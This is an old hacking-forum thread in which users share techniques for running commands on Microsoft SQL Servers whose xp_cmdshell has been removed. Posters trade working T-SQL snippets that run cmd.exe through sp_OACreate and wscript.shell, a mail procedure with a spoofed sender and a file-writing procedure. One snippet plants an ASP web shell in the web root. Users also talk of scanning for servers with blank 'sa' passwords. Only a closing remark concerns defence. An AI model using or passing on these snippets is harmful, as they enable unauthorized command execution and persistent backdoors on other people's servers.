hi, i lately figured out a method to execute commands on "secured" (xp_cmdshell deleted) mssql server ... simple trick is to bypass xp_cmdsell:
CODE
declare @s int exec sp_oacreate "wscripts.shell", @s out exec sp_oamethod @s, "run",NULL, "cmd.exe /c echo whatever>temp.txt"
just wanted evrybody t0 Kn0w =9 and again still searching ... =)
GhostCow
Feb 3 2004, 06:38 AM
cool ill test it! umm can you explain a little more about it?
Devil
Feb 3 2004, 09:31 AM
yeah....please explane this a litle bit! but if i got this right...then u use these commands on ur stro and the next person trying tohack this is gonna get sql error??am i right?
thx
jockel
Feb 3 2004, 10:28 AM
no sorry =) this is a method of tricking so called "secured" mssql servers and getting cmd.exe even if xp_cmdshell is disabled or deleted..
kenshin_efx
Feb 3 2004, 07:14 PM
let me see, if i have a sql scan whit account sa and pass blank for sample, and i try make a dir c:\ and him tell me SQL ERROR, is because xp_cmdshell was deleted or disabled and write the commands that you posted here, i can execute echo for example....or not??
i try learn english but i not enough good...xDD
the
Feb 3 2004, 08:51 PM
nice dude thx
Copkill
Feb 3 2004, 09:30 PM
Thx for this ,i will test it
mofo
Feb 4 2004, 05:00 AM
it wont work, once cmd shel is deleted, no sql queries, i know sql been roting for over 2 years.
the cmd is sp_dropextendedproc xp_cmdshell to secure
labbertasche
Feb 4 2004, 02:44 PM
big thx, very interesting, let's google to learn more about "sp_oamethod" ....
greets labbertasche
Antil
Feb 4 2004, 02:59 PM
woeii thanx for this info man!
jockel
Feb 4 2004, 03:31 PM
QUOTE (mofo @ Feb 4 2004, 05:00 AM)
it wont work, once cmd shel is deleted, no sql queries, i know sql been roting for over 2 years.
the cmd is sp_dropextendedproc xp_cmdshell to secure
?? what wont work ??
FOR SURE it works =) have done it thousand of times ... and how du u manage to delete cmd !??
HAnzsz
Feb 4 2004, 03:42 PM
mate this is good info,
but I am getting this message from the server
CODE
The command(s) completed successfully.
now I wanna check what I have echo'ed... I wanna "read" what I just echo'ed
How do I do that.. is it possible?
jockel
Feb 4 2004, 04:21 PM
first : cmd.exe /c echo whatever>temp.txt
second : cmd.exe /c type temp.txt
what else =) ?
The-X
Feb 4 2004, 04:23 PM
i did not try it, but i think you can user all dos commands...
for viewing just put the command "type *your-file*" in stead of the echo command...
Thom
Feb 4 2004, 07:38 PM
What if its admin/123 as user/pass?.. didnt get it workin for me
jockel
Feb 4 2004, 07:39 PM
its the same what tools do you use to connect....?
Fantafour
Feb 4 2004, 08:58 PM
i' have testet it with "SQL Execute helper tool 2.0"
what kind of tool did u use ?
labbertasche
Feb 4 2004, 09:14 PM
osql.exe / isql.exe
Double-=V=-
Feb 4 2004, 09:44 PM
Can somebody post or pm me a tool which can do this. I didn't understand how to get this working with osql.exe .
Cheers,
flashb4ck
Feb 4 2004, 09:57 PM
oh yeah that's a very niCe information now i'll test it 4 me
i am using sqlexec it's a nice tool but works with xp_cmdshell i think thats the problem
gr€€tZ fl4Shb4Ck
net_runner
Feb 4 2004, 09:57 PM
it will bypass the SQL ERROR or what...?
jockel
Feb 4 2004, 10:52 PM
yeah exactly .... =) just use osql ... it's really simple =) in near future i'll release an new improved sqlexec version wich supports :
- Mail Support =) - File writing support - custom cmdshell
if you have any cool ideas plz post =) who ever might need, here are some more usefull sql functions you can use with osql or new sqlexec version ....
CODE
// if you want your MSSQL Server send mails =) CREATE PROCEDURE h4x0r$mail( @adr varchar(255), @msg varchar(2000), @sub varchar(255), @from varchar(255) = 'bill.gates@microsoft.com') AS DECLARE @CDO int, @OLEResult int, @Out int --Create CDONTS.NewMail object EXECUTE @OLEResult = sp_OACreate 'CDONTS.NewMail', @CDO OUT IF @OLEResult <> 0 PRINT 'CDONTS.NewMail'
--Call Send method of the object execute @OLEResult = sp_OAMethod @CDO, 'Send', Null, @from, @adr, @sub, @msg, 0 IF @OLEResult <> 0 PRINT 'Send'
// if you ever want to write to a file ... nearly useless =) CREATE PROCEDURE h4x0r$writeToFile(@FileName varchar(255), @Text1 varchar(255)) AS DECLARE @FS int, @OLEResult int, @FileID int
EXECUTE @OLEResult = sp_OACreate 'Scripting.FileSystemObject', @FS OUT IF @OLEResult <> 0 PRINT 'Scripting.FileSystemObject'
--Open a file execute @OLEResult = sp_OAMethod @FS, 'OpenTextFile', @FileID OUT, @FileName, 8, 1 IF @OLEResult <> 0 PRINT 'OpenTextFile'
if youre gonna try adn tftp, make sure that they have tftp.exe, lol, if it doesnt, try ftp.exe but if the admin secured his xp cmd shell, ftp.exe and tftp.exe might also be gone
Axl
Feb 6 2004, 02:36 AM
actually i was using ftp and all i get is 1> 2> 3> 4> 5> 6> 7> 8> 9>
BigBen
Feb 6 2004, 03:14 AM
QUOTE
actually i was using ftp and all i get is 1> 2> 3> 4> 5> 6> 7> 8> 9>
me too dont work or make i something wrong ?
greetz
BigBen
jockel
Feb 6 2004, 06:21 PM
you dont get the results displayed with my script .. it just executes them directly because of the "run" paramter .. try being creativ ... you can spawn your shell in thousand way's ..
do i really have to explain EVERYTHINg step by step !??
i think you can do this on your own .... dont give up
ps.: one way (as i said of thounds !! think of your own ! be creative ) is for example writing an asp file with cmd =)
e.g.:
CODE
-- scripting.filesystemobject example - create a 'run this' .asp file declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out,'c:\inetpub\wwwroot\foo1.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd") ) %>'
and please remeber i post just examples !!! and bevor posting stuff like "eh not working buddy. " plz be so kind to find out HOW =)
sry to go off topic, but anyone have isql.exe?, i cant seem to find it alone on the forum or with google, Thanks in advance
Axl
Feb 7 2004, 01:30 AM
QUOTE (jockel @ Feb 6 2004, 06:21 PM)
you dont get the results displayed with my script .. it just executes them directly because of the "run" paramter .. try being creativ ... you can spawn your shell in thousand way's ..
do i really have to explain EVERYTHINg step by step !??
i think you can do this on your own .... dont give up
ps.: one way (as i said of thounds !! think of your own ! be creative ) is for example writing an asp file with cmd =)
e.g.:
CODE
-- scripting.filesystemobject example - create a 'run this' .asp file declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out,'c:\inetpub\wwwroot\foo1.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd") ) %>'
and please remeber i post just examples !!! and bevor posting stuff like "eh not working buddy. " plz be so kind to find out HOW =)
Er you are funny, you just fecking said that those commands one could use to upload to an ftp server. If you are gonna act like you have discovered something monumental, you could at least back it up. I notice not a single person has said that it was successful
labbertasche
Feb 7 2004, 07:18 AM
np here is isql.exe (mhhh no upload .... *grummel* ) ok ... here is a link
About securing MSSQL box, I've learn rediang your post that you do it deleting the "procedure" or "method" ( I dont know MSSQL ) that is used to run cmd.
I've read in some tutorial people who secure the box by changing the sa password... this is wrong? Cause after this change sysop may notice it?
Sorry for stupid question if it is. I'm new here and in the scene ( just 1 hacxxx lol ).
Thank you
Thom
Feb 9 2004, 02:33 PM
This isnt the "hacxxx" scene. This is the security scene... go to FXPBoards for "hacxxx" scene...
tyler.durden
Feb 9 2004, 02:43 PM
QUOTE (Thom @ Feb 9 2004, 02:33 PM)
This isnt the "hacxxx" scene. This is the security scene... go to FXPBoards for "hacxxx" scene...
sorry... you are right...
I would not mean this... I only ask what the situation about changing the sa password by the attacker.
jockel
Feb 9 2004, 06:09 PM
i think normally a h4x0r wouldn't do that thats too obvious .. a good method of securing is to deny "execute" rights for sa .. that throws errors like : [Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
...
If you are gonna act like you have discovered something monumental, you could at least back it up. I notice not a single person has said that it was successful 
